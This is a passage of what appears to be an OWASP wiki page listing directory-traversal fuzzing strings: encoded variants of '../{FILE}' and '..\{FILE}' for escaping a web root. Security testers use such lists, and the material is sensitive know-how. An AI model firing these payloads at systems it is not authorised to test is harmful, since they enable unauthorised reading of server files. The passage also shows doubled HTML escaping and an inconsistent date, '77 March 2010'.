/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (77 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (7 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
